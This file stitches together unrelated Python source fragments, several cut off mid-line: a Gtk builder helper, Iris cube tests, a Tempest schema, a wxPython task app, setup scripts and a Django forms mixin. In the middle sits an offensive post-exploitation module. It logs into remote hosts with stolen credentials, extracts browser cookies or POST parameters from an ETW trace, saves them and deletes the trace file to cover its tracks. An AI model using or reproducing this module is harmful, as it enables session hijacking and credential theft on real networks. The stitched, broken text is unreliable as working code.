# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more d | etails.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
### END LICENSE
### DO NOT EDIT THIS FILE ###
'''Enhances builder connections, provides object to access glade objects'''
from gi.repository import GObject, Gtk # pylint: disable=E0611
import inspect
import functools
import logging
logger = logging.getLogger('accomplishments_viewer_lib')
from xml.etree.cElementTree import ElementTree
# this module is | big so uses some conventional prefixes and postfixes
# *s list, except self.widgets is a dictionary
# *_dict dictionary
# *name string
# ele_* element in a ElementTree
# pylint: disable=R0904
# the many public methods is a feature of Gtk.Builder
class Builder(Gtk.Builder):
    ''' extra features
    connects glade defined handler to default_handler if necessary
    auto connects widget to handler with matching name or alias
    auto connects several widgets to a handler via multiple aliases
    allow handlers to lookup widget name
    logs every connection made, and any on_* not made
    '''

    def __init__(self):
        Gtk.Builder.__init__(self)
        # widget id -> widget object, populated by add_from_file()
        self.widgets = {}
        # handler name (from glade) -> None until a callback is attached
        self.glade_handler_dict = {}
        # (widget name, signal name, handler name) tuples from glade
        self.connections = []
        # widget object -> widget id; inverse of self.widgets
        self._reverse_widget_dict = {}

    # pylint: disable=R0201
    # this is a method so that a subclass of Builder can redefine it
    def default_handler(self, handler_name, filename, *args, **kwargs):
        '''helps the apprentice guru
        glade defined handlers that do not exist come here instead.
        An apprentice guru might wonder which signal does what he wants,
        now he can define any likely candidates in glade and notice which
        ones get triggered when he plays with the project.
        this method does not appear in Gtk.Builder'''
        logger.debug('''tried to call non-existent function:%s()
        expected in %s
        args:%s
        kwargs:%s''', handler_name, filename, args, kwargs)
    # pylint: enable=R0201

    def get_name(self, widget):
        ''' allows a handler to get the name (id) of a widget
        this method does not appear in Gtk.Builder'''
        return self._reverse_widget_dict.get(widget)

    def add_from_file(self, filename):
        '''parses xml file and stores wanted details'''
        Gtk.Builder.add_from_file(self, filename)

        # extract data for the extra interfaces
        tree = ElementTree()
        tree.parse(filename)

        # NOTE(review): getiterator() is deprecated in favour of iter() in
        # newer ElementTree versions -- kept as-is for the targeted version.
        ele_widgets = tree.getiterator("object")
        for ele_widget in ele_widgets:
            name = ele_widget.attrib['id']
            widget = self.get_object(name)

            # populate indexes - a dictionary of widgets
            self.widgets[name] = widget

            # populate a reversed dictionary
            self._reverse_widget_dict[widget] = name

            # populate connections list
            ele_signals = ele_widget.findall("signal")

            connections = [
                (name,
                 ele_signal.attrib['name'],
                 ele_signal.attrib['handler']) for ele_signal in ele_signals]

            if connections:
                self.connections.extend(connections)

        # record every glade-declared handler name; None marks "unattached"
        ele_signals = tree.getiterator("signal")
        for ele_signal in ele_signals:
            self.glade_handler_dict.update(
                {ele_signal.attrib["handler"]: None})

    def connect_signals(self, callback_obj):
        '''connect the handlers defined in glade
        reports successful and failed connections
        and logs call to missing handlers'''
        filename = inspect.getfile(callback_obj.__class__)
        callback_handler_dict = dict_from_callback_obj(callback_obj)
        connection_dict = {}
        connection_dict.update(self.glade_handler_dict)
        connection_dict.update(callback_handler_dict)
        for item in connection_dict.items():
            if item[1] is None:
                # the handler is missing so reroute to default_handler
                handler = functools.partial(
                    self.default_handler, item[0], filename)

                connection_dict[item[0]] = handler

                # replace the run time warning
                logger.warn("expected handler '%s' in %s", item[0], filename)

        # connect glade define handlers
        Gtk.Builder.connect_signals(self, connection_dict)

        # let's tell the user how we applied the glade design
        for connection in self.connections:
            widget_name, signal_name, handler_name = connection
            logger.debug("connect builder by design '%s', '%s', '%s'",
                         widget_name, signal_name, handler_name)

    def get_ui(self, callback_obj=None, by_name=True):
        '''Creates the ui object with widgets as attributes
        connects signals by 2 methods
        this method does not appear in Gtk.Builder'''

        result = UiFactory(self.widgets)

        # Hook up any signals the user defined in glade
        if callback_obj is not None:
            # connect glade define handlers
            self.connect_signals(callback_obj)

            if by_name:
                auto_connect_by_name(callback_obj, self)

        return result
# pylint: disable=R0903
# this class deliberately does not provide any public interfaces
# apart from the glade widgets
class UiFactory():
    ''' provides an object with attributes as glade widgets'''
    def __init__(self, widget_dict):
        self._widget_dict = widget_dict
        # expose every widget as an attribute under its glade id
        for (widget_name, widget) in widget_dict.items():
            setattr(self, widget_name, widget)

        # Mangle any non-usable names (like with spaces or dashes)
        # into pythonic ones
        cannot_message = """cannot bind ui.%s, name already exists
        consider using a pythonic name instead of design name '%s'"""
        consider_message = """consider using a pythonic name instead of design name '%s'"""

        for (widget_name, widget) in widget_dict.items():
            pyname = make_pyname(widget_name)
            if pyname != widget_name:
                if hasattr(self, pyname):
                    # mangled name collides with an existing attribute
                    logger.debug(cannot_message, pyname, widget_name)
                else:
                    logger.debug(consider_message, widget_name)
                    setattr(self, pyname, widget)

        def iterator():
            '''Support 'for o in self' '''
            return iter(widget_dict.values())
        # NOTE(review): assigning __iter__ on the *instance* only takes
        # effect for old-style (Python 2) classes; on new-style classes
        # dunder lookup goes through the type. Confirm the targeted
        # Python version.
        setattr(self, '__iter__', iterator)

    def __getitem__(self, name):
        'access as dictionary where name might be non-pythonic'
        return self._widget_dict[name]
# pylint: enable=R0903
def make_pyname(name):
    '''Mangles a non-pythonic name into a pythonic one.

    Letters and underscores pass through unchanged; digits pass through
    except in the leading position; every other character becomes '_'.
    '''
    chars = []
    for ch in name:
        keep = ch.isalpha() or ch == '_' or (chars and ch.isdigit())
        chars.append(ch if keep else '_')
    return ''.join(chars)
# Until bug https://bugzilla.gnome.org/show_bug.cgi?id=652127 is fixed, we
# need to reimplement inspect.getmembers. GObject introspection doesn't
# play nice with it.
def getmembers(obj, check):
    """Replacement for inspect.getmembers (see GNOME bug 652127): returns
    the sorted (name, attribute) pairs of *obj* for which check(attribute)
    holds, skipping attributes whose access raises."""
    members = []
    for k in dir(obj):
        try:
            attr = getattr(obj, k)
        except Exception:
            # BUG FIX: was a bare 'except:', which also swallowed
            # SystemExit/KeyboardInterrupt. Exception is still broad enough
            # for GObject-introspection attribute access failures.
            continue
        if check(attr):
            members.append((k, attr))
    members.sort()
    return members
def dict_from_callback_obj(callback_obj):
'''a dictionary interface to callback_obj'''
methods = getmembers(callback_obj, inspect.ismethod)
aliased_methods = [x[1] for x in methods if hasattr(x[1], 'aliases')]
|
e.add_aux_coord(scalar_aux_coord)
self.assertEqual(set(cube.aux_coords), {scalar_dim_coord, scalar_aux_coord})
# Various options for dims
cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord, [])
self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord, ())
self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord, None)
self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord)
self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
def test_add_aux_coord(self):
    """Both DimCoords and AuxCoords are accepted as auxiliary coords."""
    # A DimCoord may live in cube.aux_coords.
    y_another = iris.coords.DimCoord(
        np.array([2.5, 7.5, 12.5]), long_name='y_another')
    self.cube.add_aux_coord(y_another, 0)
    self.assertEqual(self.cube.dim_coords, ())
    self.assertEqual(self.cube.coords(), [y_another])
    self.assertEqual(self.cube.aux_coords, (y_another,))
    # AuxCoords belong in cube.aux_coords too.
    self.cube.add_aux_coord(self.xy, [0, 1])
    self.assertEqual(self.cube.dim_coords, ())
    self.assertEqual(self.cube.coords(), [y_another, self.xy])
    self.assertEqual(set(self.cube.aux_coords), {y_another, self.xy})
    # Coordinate and dimension lengths must match up.
    fresh = self.cube.copy()
    with self.assertRaises(ValueError):
        fresh.add_aux_coord(self.xy, [1, 0])
def test_remove_coord(self):
    """Coordinates can be removed one at a time by name."""
    self.cube.add_dim_coord(self.y, 0)
    self.cube.add_dim_coord(self.x, 1)
    self.cube.add_aux_coord(self.xy, (0, 1))
    self.assertEqual(set(self.cube.coords()), {self.y, self.x, self.xy})
    # Remove each coordinate in turn and check what remains.
    for name, remaining in (('xy', {self.y, self.x}),
                            ('x', {self.y}),
                            ('y', set())):
        self.cube.remove_coord(name)
        self.assertEqual(set(self.cube.coords()), remaining)
def test_immutable_dimcoord_dims(self):
    """The cube keeps its own copy of the dims mapping for a DimCoord."""
    dims = [1]
    self.cube.add_dim_coord(self.x, dims)
    self.assertEqual(self.cube.coord_dims(self.x), (1,))
    # Mutating the caller's list must not affect the cube.
    dims[0] = 0
    self.assertEqual(self.cube.coord_dims(self.x), (1,))
    # And the returned dims mapping itself is read-only.
    returned = self.cube.coord_dims(self.x)
    with self.assertRaises(TypeError):
        returned[0] = 0
def test_immutable_auxcoord_dims(self):
    """Same immutability contract as the DimCoord case, for AuxCoords."""
    # Add AuxCoord to dimensions (0, 1)
    dims = [0, 1]
    self.cube.add_aux_coord(self.xy, dims)
    self.assertEqual(self.cube.coord_dims(self.xy), (0, 1))
    # Change dims object
    dims[0] = 1
    dims[1] = 0
    # Check the cube is unchanged
    self.assertEqual(self.cube.coord_dims(self.xy), (0, 1))
    # Check coord_dims cannot be changed (tuple item assignment).
    dims = self.cube.coord_dims(self.xy)
    with self.assertRaises(TypeError):
        dims[0] = 1
class TestStockCubeStringRepresentations(tests.IrisTest):
    """Check str() and repr() of a stock 4d cube at every slicing depth.

    Each test only asserts that the text matches the stored reference
    (via assertString); indexing reduces the cube one dimension at a
    time down to a 0d (scalar) cube.
    """
    def setUp(self):
        self.cube = iris.tests.stock.realistic_4d()

    def test_4d_str(self):
        self.assertString(str(self.cube))

    def test_4d_repr(self):
        self.assertString(repr(self.cube))

    def test_3d_str(self):
        self.assertString(str(self.cube[0]))

    def test_3d_repr(self):
        self.assertString(repr(self.cube[0]))

    def test_2d_str(self):
        self.assertString(str(self.cube[0, 0]))

    def test_2d_repr(self):
        self.assertString(repr(self.cube[0, 0]))

    def test_1d_str(self):
        self.assertString(str(self.cube[0, 0, 0]))

    def test_1d_repr(self):
        self.assertString(repr(self.cube[0, 0, 0]))

    def test_0d_str(self):
        self.assertString(str(self.cube[0, 0, 0, 0]))

    def test_0d_repr(self):
        self.assertString(repr(self.cube[0, 0, 0, 0]))
@tests.skip_data
class TestCubeStringRepresentations(IrisDotTest):
def setUp(self):
    """Load a 2d PP cube and build a cube carrying a unicode attribute."""
    path = tests.get_data_path(('PP', 'simple_pp', 'global.pp'))
    self.cube_2d = iris.load_cube(path)
    # Generate the unicode cube up here now it's used in two tests.
    unicode_str = six.unichr(40960) + u'abcd' + six.unichr(1972)
    self.unicode_cube = iris.tests.stock.simple_1d()
    self.unicode_cube.attributes['source'] = unicode_str
def test_dot_simple_pp(self):
    """Dot output of a 2d cube loaded from pp, with and without
    custom cube/coordinate attributes."""
    cube = self.cube_2d
    cube.attributes['my_attribute'] = 'foobar'
    self.check_dot(cube, ('file_load', 'global_pp.dot'))
    pt = cube.coord('time')
    # and with custom coord attributes
    pt.attributes['monty'] = 'python'
    pt.attributes['brain'] = 'hurts'
    self.check_dot(cube, ('file_load', 'coord_attributes.dot'))
    # Tidy up the attributes added above.
    del pt.attributes['monty']
    del pt.attributes['brain']
    del cube.attributes['my_attribute']

# TODO hybrid height and dot output - relationship links
def test_dot_4d(self):
    """Dot output of the stock realistic 4d cube."""
    cube = iris.tests.stock.realistic_4d()
    self.check_dot(cube, ('file_load', '4d_pp.dot'))
def test_missing_coords(self):
    """str/repr still match their references after coords are removed."""
    cube = iris.tests.stock.realistic_4d()
    cube.remove_coord('time')
    cube.remove_coord('model_level_number')
    self.assertString(repr(cube),
                      ('cdm', 'str_repr', 'missing_coords_cube.repr.txt'))
    self.assertString(str(cube),
                      ('cdm', 'str_repr', 'missing_coords_cube.str.txt'))
def test_cubelist_string(self):
    """str() and repr() of a two-cube CubeList match their references."""
    cube_list = iris.cube.CubeList([iris.tests.stock.realistic_4d(),
                                    iris.tests.stock.global_pp()])
    self.assertString(str(cube_list), ('cdm', 'str_repr', 'cubelist.__str__.txt'))
    self.assertString(repr(cube_list), ('cdm', 'str_repr', 'cubelist.__repr__.txt'))
def test_basic_0d_cube(self):
    """repr, unicode and str of a 0d slice each match their reference."""
    self.assertString(repr(self.cube_2d[0, 0]),
                      ('cdm', 'str_repr', '0d_cube.__repr__.txt'))
    self.assertString(six.text_type(self.cube_2d[0, 0]),
                      ('cdm', 'str_repr', '0d_cube.__unicode__.txt'))
    self.assertString(str(self.cube_2d[0, 0]),
                      ('cdm', 'str_repr', '0d_cube.__str__.txt'))
def test_similar_coord(self):
cube = self.cube_2d.copy()
lon = cube.coord('longitude')
lon.attributes['flight'] = '218BX'
lon.attributes['sensor_id'] = 808
lon.attributes['status'] = 2
lon2 = lon.copy()
lon2.attributes['sensor_id'] = 810
lon2.attributes['ref'] = 'A8T-22'
del lon2.attributes['status']
cube.add_aux_coord(lon2, [1])
lat = cube.coord('latitude')
lat2 = lat.copy()
lat2.attributes['test'] = 'True'
cube.add_aux_coord(lat2, [0])
self.assertString(str(cube), ('cdm', 'str_repr', 'similar.__str__.txt'))
def test_cube_summary_cell_methods(self):
    """Cell methods are rendered correctly in the cube summary."""
    cube = self.cube_2d.copy()
    # (methods, coords, intervals, comments) tuples used to build cell methods.
    test_values = (
        (("mean",), (u'longitude', 'latitude'), (u'6 minutes', '12 minutes'), (u'This is a test comment',)),
        (("average",), (u'longitude', 'latitude'), (u'6 minutes', '15 minutes'), (u'This is another test comment', 'This is another comment')),
        (("average",), (u'longitude', 'latitude'), (), ()),
        (("percentile",), (u'longitude',), (u'6 minutes',), (u'This is another test comment',)),
    )
    for methods, coords, intervals, comments in test_values:
        cube.add_cell_method(iris.coords.CellMethod(
            method=methods[0], coords=coords,
            intervals=intervals, comments=comments))
    self.assertString(str(cube), ('cdm', 'str_repr', 'cell_methods.__str__.txt'))
def test_cube_summary_alignment(self):
# Test the cube summary dimension |
"""
Parses the results found for the ETW started on a machine,
downloads the results and stops the ETW.
All credit to pauldotcom-
http://pauldotcom.com/2012/07/post-exploitation-recon-with-e.html
Module built by @harmj0y
"""
import settings
from lib import command_methods
from lib import helpers
from lib import smb
class Module:
    """Pillage module: stop a running ETW trace on each target, pull back
    the filtered results, and delete the remote trace file."""

    def __init__(self, targets=None, creds=None, args=None):
        self.name = "ETW Data Download"
        self.description = "Download data results from ETW and clean everything up."
        # internal list() that holds one or more targets
        self.targets = targets
        # internal list() that holds one or more cred tuples
        #   [ (username, pw), (username2, pw2), ...]
        self.creds = creds
        # a state output file that will be written out by pillage.py
        #   ex- if you're querying domain users
        self.output = ""
        # user interaction for- format is {Option : [Value, Description]}
        self.required_options = {
            "trigger_method": ["wmis", "[wmis] or [winexe] for triggering"],
            "flag": ["cookies", "search for [cookies] or [post] parameters"]}

    def run(self):
        """For each target: stop the 'Status32' trace, grep the .etl dump
        for the configured flag, save any hits, and delete the dump."""
        # assume single set of credentials
        username, password = self.creds[0]
        triggerMethod = self.required_options["trigger_method"][0]
        flag = self.required_options["flag"][0]
        for target in self.targets:
            # stop the ETW
            stopCMD = "logman stop Status32 -ets"
            command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)
            # search for cookies or POST parameters
            if flag.lower() == "post":
                flag = "POST"
                moduleFile = "post_params.txt"
            else:
                flag = "cookie added"
                moduleFile = "cookies.txt"
            # check the ETW results for the specified flag, and delete the dump file
            parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\""
            # wait 20 seconds for everything to parse...if errors happen, increase this
            parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)
            # delete the trace file
            delCmd = "del C:\\Windows\\Temp\\status32.etl"
            command_methods.executeCommand(target, username, password, delCmd, triggerMethod)
            if parseResult == "":
                self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n"
            else:
                # save the file off to the appropriate location
                saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
                self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
|
from .Condition import C | ondition
from .Configuration import Configuration
from .Classifier import Classifier
from .ClassifiersList import ClassifiersList
from .XCS import XCS
from . | GeneticAlgorithm import *
|
# Copyright 2014 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Response schema for one entry of the "services" array.
_service_item = {
    'type': 'object',
    'properties': {
        'id': {'type': ['integer', 'string'],
               'pattern': '^[a-zA-Z!]*@[0-9]+$'},
        'zone': {'type': 'string'},
        'host': {'type': 'string'},
        'state': {'type': 'string'},
        'binary': {'type': 'string'},
        'status': {'type': 'string'},
        'updated_at': {'type': ['string', 'null']},
        'disabled_reason': {'type': ['string', 'null']},
    },
    'additionalProperties': False,
    'required': ['id', 'zone', 'host', 'state', 'binary',
                 'status', 'updated_at', 'disabled_reason'],
}

# Expected response for the "list services" API call.
list_services = {
    'status_code': [200],
    'response_body': {
        'type': 'object',
        'properties': {
            'services': {'type': 'array', 'items': _service_item},
        },
        'additionalProperties': False,
        'required': ['services'],
    },
}
# Expected response for enabling/disabling a service: a single "service"
# object with three string fields.
_enable_disable_props = {name: {'type': 'string'}
                         for name in ('status', 'binary', 'host')}

enable_disable_service = {
    'status_code': [200],
    'response_body': {
        'type': 'object',
        'properties': {
            'service': {
                'type': 'object',
                'properties': _enable_disable_props,
                'additionalProperties': False,
                'required': ['status', 'binary', 'host'],
            },
        },
        'additionalProperties': False,
        'required': ['service'],
    },
}
|
fresh()
def Refresh(self, erase=True, rect=None, parent=None):
    """Refreshes the tree when a task has changed.

    Recursively walks the tree from *parent* (the root by default),
    refilling each item's columns from its attached task, then calls the
    base-class Refresh to repaint.  *erase* and *rect* are accepted for
    signature compatibility with the wx Refresh API but are unused here.
    """
    if parent is None:
        parent = self.root
    for child in parent.GetChildren():
        task = child.GetData()
        if task:
            # Columns: 0 = progress, 1 = priority, 2 = summary, 3 = due date.
            self.SetItemText(child, '0%', 0)
            self.SetItemText(child, str(task._priority), 1)
            self.SetItemText(child, task.summary, 2)
            child.Check(task.is_complete)
            if HIDE_COMPLETE:
                # Optionally hide items that are already complete.
                child.Hide(task.is_complete)
            if task.due_date:
                self.SetItemText(child, task.due_date.strftime('%H:%M %m/%d/%y'), 3)
            else:
                self.SetItemText(child, '', 3)
        # Recurse into this item's children.
        self.Refresh(parent=child)
    super(TaskList, self).Refresh()
class TaskInfoDialog(wx.Dialog):
    """Modal dialog for creating or editing a single Task.

    Pass an existing task via the ``task`` keyword to edit it; call
    GetTask() after the dialog closes to retrieve the new or updated
    Task object.
    """

    def __init__(self, *args, **kwds):
        self.task = kwds.pop('task', None)
        kwds['style'] = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER | wx.THICK_FRAME
        wx.Dialog.__init__(self, *args, **kwds)
        self.panel = wx.Panel(self, -1)
        self.txtSummary = wx.TextCtrl(self.panel, -1, "")
        self.lblNotes = wx.StaticText(self.panel, -1, _('Notes:'), style=wx.ALIGN_RIGHT)
        self.txtNotes = wx.TextCtrl(self.panel, -1, "", style=wx.TE_MULTILINE|wx.TE_RICH|wx.TE_WORDWRAP)
        self.lblPriority = wx.StaticText(self.panel, -1, _('Priority:'), style=wx.ALIGN_RIGHT)
        # Priority display labels, ordered by their numeric key.
        choices = [p[1] for p in sorted(PRIORITIES.items(), key=lambda p: p[0])]
        self.cmbPriority = wx.ComboBox(self.panel, -1, choices=choices, style=wx.CB_DROPDOWN)
        self.chkIsComplete = wx.CheckBox(self.panel, -1, _('Is Complete'))
        self.lblDateDue = wx.StaticText(self.panel, -1, _('Due:'), style=wx.ALIGN_RIGHT)
        self.chkIsDue = wx.CheckBox(self.panel, -1, _('Has due date'))
        self.calDueDate = wx.calendar.CalendarCtrl(self.panel, -1)
        self.txtTime = TimeCtrl(self.panel, id=-1,
                                value=datetime.now().strftime('%X'),
                                style=wx.TE_PROCESS_TAB,
                                validator=wx.DefaultValidator,
                                format='24HHMMSS',
                                fmt24hr=True,
                                displaySeconds=True,
                                )
        self.__set_properties()
        self.__do_layout()
        self.chkIsDue.Bind(wx.EVT_CHECKBOX, self.ToggleDueDate)
        self.txtSummary.SetFocus()
        if self.task is not None:
            self.SetTask(self.task)

    def __set_properties(self):
        """Set initial widget state: title, default priority, pickers off."""
        self.SetTitle(_('Task Information'))
        self.cmbPriority.SetValue(PRIORITIES[DEFAULT_PRIORITY])
        # Date/time pickers stay disabled until 'Has due date' is checked.
        self.calDueDate.Enable(False)
        self.txtTime.Enable(False)

    def __do_layout(self):
        """Lay the widgets out in a two-column grid plus OK/Cancel buttons."""
        mainSizer = wx.BoxSizer(wx.VERTICAL)
        sizer = wx.FlexGridSizer(5, 2, 5, 5)
        lblSubject = wx.StaticText(self.panel, -1, _('Summary:'))
        sizer.Add(lblSubject, 0, wx.EXPAND, 0)
        sizer.Add(self.txtSummary, 0, wx.ALL|wx.EXPAND, 0)
        sizer.Add(self.lblNotes, 0, wx.EXPAND, 0)
        sizer.Add(self.txtNotes, 0, wx.EXPAND, 0)
        sizer.Add(self.lblPriority, 0, wx.EXPAND, 0)
        sizer.Add(self.cmbPriority, 0, wx.EXPAND, 0)
        sizer.Add((20, 20), 0, 0, 0)
        sizer.Add(self.chkIsComplete, 0, 0, 0)
        sizer.Add(self.lblDateDue, 0, wx.ALIGN_RIGHT, 0)
        sizer.Add(self.chkIsDue, 0, 0, 0)
        sizer.Add((20, 20), 0, 0, 0)
        sizer.Add(self.calDueDate, 0, 0, 0)
        sizer.Add((20, 20), 0, 0, 0)
        sizer.Add(self.txtTime, 0, 0, 0)
        self.panel.SetSizer(sizer)
        # Let the notes row/column absorb any extra space.
        sizer.AddGrowableRow(1)
        sizer.AddGrowableCol(1)
        mainSizer.Add(self.panel, 1, wx.ALL|wx.EXPAND, 5)
        mainSizer.AddF(self.CreateStdDialogButtonSizer(wx.OK|wx.CANCEL),
                       wx.SizerFlags(0).Expand().Border(wx.BOTTOM|wx.RIGHT, 5))
        self.SetSizer(mainSizer)
        mainSizer.Fit(self)
        self.Layout()
        self.Centre()
        size = (290, 450)
        self.SetMinSize(size)
        self.SetSize(size)

    def ToggleDueDate(self, evt):
        """Enable/disable the date and time pickers to match the checkbox."""
        en = self.chkIsDue.IsChecked()
        self.calDueDate.Enable(en)
        self.txtTime.Enable(en)

    def GetTask(self):
        """Build (or refresh) self.task from the widget values and return it."""
        if self.task is None:
            self.task = Task()
        if self.chkIsDue.IsChecked():
            due = self.calDueDate.PyGetDate()
            tm = self.txtTime.GetValue()
            try:
                tm = datetime.strptime(tm, '%H:%M:%S').time()
            except ValueError:
                # BUG FIX: was a bare ``except:``. strptime raises ValueError
                # on a format mismatch, so catch exactly that before retrying
                # without the seconds component.
                tm = datetime.strptime(tm, '%H:%M').time()
            due = datetime.combine(due, tm)
        else:
            due = None
        self.task.summary = self.txtSummary.GetValue()
        self.task.is_complete = self.chkIsComplete.IsChecked()
        self.task.due_date = due
        self.task.priority = self.cmbPriority.GetValue()
        self.task.notes = self.txtNotes.GetValue()
        return self.task

    def SetTask(self, task):
        """Populate every widget from *task* and remember it as current."""
        self.txtSummary.SetValue(task.summary)
        self.txtNotes.SetValue(task.notes)
        self.cmbPriority.SetStringSelection(task.priority)
        self.chkIsComplete.SetValue(task.is_complete)
        if task.due_date is not None:
            self.chkIsDue.SetValue(True)
            self.calDueDate.PySetDate(task.due_date)
            self.txtTime.SetValue(task.due_date.strftime('%X'))
        self.task = task
class TreeDoFrame(wx.Frame):
"""
This is the main TreeDo window, where your tasks are laid out before you.
"""
def __init__(self):
    """Build the main frame: toolbar, task tree, and event bindings."""
    wx.Frame.__init__(self, None, -1, title=_('TreeDo'), size=(350, 500))
    self.SetMinSize((300, 300))
    self.CenterOnParent()
    # Toolbar with save/add/add-subtask/expand/delete actions.
    self.toolbar = self.CreateToolBar(wx.TB_HORIZONTAL | wx.NO_BORDER | wx.TB_FLAT)
    self.toolbar.SetToolBitmapSize((24, 24))
    save_img = wx.Bitmap('res/save.png', wx.BITMAP_TYPE_PNG)
    add_img = wx.Bitmap('res/add.png', wx.BITMAP_TYPE_PNG)
    add_sub_img = wx.Bitmap('res/add_subtask.png', wx.BITMAP_TYPE_PNG)
    collapse_img = wx.Bitmap('res/collapse.png', wx.BITMAP_TYPE_PNG)
    expand_img = wx.Bitmap('res/expand.png', wx.BITMAP_TYPE_PNG)
    delete_img = wx.Bitmap('res/delete.png', wx.BITMAP_TYPE_PNG)
    self.toolbar.AddSimpleTool(wx.ID_SAVE, save_img, _('Save Task List'), _('Save the task list to the hard drive'))
    self.toolbar.AddSimpleTool(ID_ADD_TASK, add_img, _('Add Task'), _('Create a new task'))
    self.toolbar.AddSimpleTool(ID_ADD_SUBTASK, add_sub_img, _('Add Sub-Task'), _('Create a new subtask'))
    #self.toolbar.AddSimpleTool(ID_COLLAPSE, collapse_img, _('Collapse'), _('Collapse all tasks'))
    self.toolbar.AddSimpleTool(ID_EXPAND, expand_img, _('Expand'), _('Expand all tasks'))
    self.toolbar.AddSimpleTool(wx.ID_DELETE, delete_img, _('Delete'), _('Delete this task'))
    self.Bind(wx.EVT_TOOL, self.OnToolClick)
    self.toolbar.Realize()
    # The task tree fills the rest of the frame.
    sizer = wx.BoxSizer(wx.VERTICAL)
    self.tree = TaskList(self)
    sizer.Add(self.tree, 1, wx.EXPAND)
    self.Bind(wx.EVT_SIZE, self.UpdateColumnWidths)
    self.tree.Bind(wx.EVT_TREE_SEL_CHANGED, self.ToggleToolbarButtons)
    # Load the persisted task list and sync the toolbar state.
    self.tree.SetTasks(DATA.get_list())
    self.ToggleToolbarButtons()
def UpdateColumnWidths(self, evt=None):
    """Resize the tree columns to fit the current frame width.

    Bound to wx.EVT_SIZE, but may also be called directly (evt=None).
    """
    width, height = self.GetSize()
    self.tree.SetColumnWidth(0, 40)
    self.tree.SetColumnWidth(1, 20)
    # The summary column absorbs whatever the fixed columns leave over.
    self.tree.SetColumnWidth(2, width - 180)
    self.tree.SetColumnWidth(3, 100)
    # BUG FIX: evt defaults to None, but evt.Skip() was called
    # unconditionally, raising AttributeError on direct calls.  Guard it,
    # matching ToggleToolbarButtons below.
    if evt:
        evt.Skip()
def ToggleToolbarButtons(self, evt=None):
    """Enable or disable certain toolbar buttons based on the selection"""
    # Sub-task and delete actions only apply to a real task node,
    # not the (invisible) root item.
    enable_sub_btns = (self.tree.GetSelection() != self.tree.root)
    self.toolbar.EnableTool(ID_ADD_SUBTASK, enable_sub_btns)
    self.toolbar.EnableTool(wx.ID_DELETE, enable_sub_btns)
    if evt:
        evt.Skip()
def AddTask(self, parent=None):
"""Allows the user to add a new task"""
taskDlg = TaskInfoDialog(self, |
f | rom distutils.core import s | etup
import py2exe
setup(console=['newsputnik.py']) |
import os
from setuptools import setup
########## autover ##########
def get_setup_version(reponame):
    """Use autover to get up to date version."""
    # importing self into setup.py is unorthodox, but param has no
    # required dependencies outside of python
    from param.version import Version
    # archive_commit is substituted by git-archive's export-subst attribute.
    return Version.setup_version(os.path.dirname(__file__),reponame,archive_commit="$Format:%h$")
########## dependencies ##########
# Optional dependency groups, exposed as `pip install param[tests]` etc.
extras_require = {
    # pip doesn't support tests_require
    # (https://github.com/pypa/pip/issues/1197)
    'tests': [
        'nose',
        'flake8'
    ]
}

# 'all' is the union of every extras group.
extras_require['all'] = sorted(set(sum(extras_require.values(), [])))

########## metadata for setuptools ##########

setup_args = dict(
    name='param',
    version=get_setup_version("param"),
    description='Declarative Python programming using Parameters.',
    # Fall back to a placeholder when building without README.rst present.
    long_description=open('README.rst').read() if os.path.isfile('README.rst') else 'Consult README.rst',
    author="IOAM",
    author_email="developers@topographica.org",
    maintainer="IOAM",
    maintainer_email="developers@topographica.org",
    platforms=['Windows', 'Mac OS X', 'Linux'],
    license='BSD',
    url='http://ioam.github.com/param/',
    packages=["param","numbergen"],
    provides=["param","numbergen"],
    include_package_data = True,
    python_requires=">=2.7",
    install_requires=[],
    extras_require=extras_require,
    tests_require=extras_require['tests'],
    classifiers=[
        "License :: OSI Approved :: BSD License",
        "Development Status :: 5 - Production/Stable",
        "Programming Language :: Python :: 2",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.4",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Operating System :: OS Independent",
        "Intended Audience :: Science/Research",
        "Intended Audience :: Developers",
        "Natural Language :: English",
        "Topic :: Scientific/Engineering",
        "Topic :: Software Development :: Libraries"]
)

if __name__=="__main__":
    setup(**setup_args)
|
# -*- coding: utf-8 -*-
from django.forms import fields
from django.forms import widgets
from djng.forms import field_mixins
from . import widgets as bs3widgets
class BooleanFieldMixin(field_mixins.BooleanFieldMixin):
    """Convert a BooleanField's stock CheckboxInput into the Bootstrap3 one."""

    def get_converted_widget(self):
        assert(isinstance(self, fields.BooleanField))
        if isinstance(self.widget, widgets.CheckboxInput):
            self.widget_css_classes = None
            if not isinstance(self.widget, bs3widgets.CheckboxInput):
                new_widget = bs3widgets.CheckboxInput(self.label)
                # Tuple assignment on purpose: the RHS is evaluated first, so
                # the choice_label set by CheckboxInput(self.label) is saved
                # before __dict__ is replaced wholesale, then restored.
                new_widget.__dict__, new_widget.choice_label = self.widget.__dict__, new_widget.choice_label
                self.label = ''  # label is rendered by the widget and not by BoundField.label_tag()
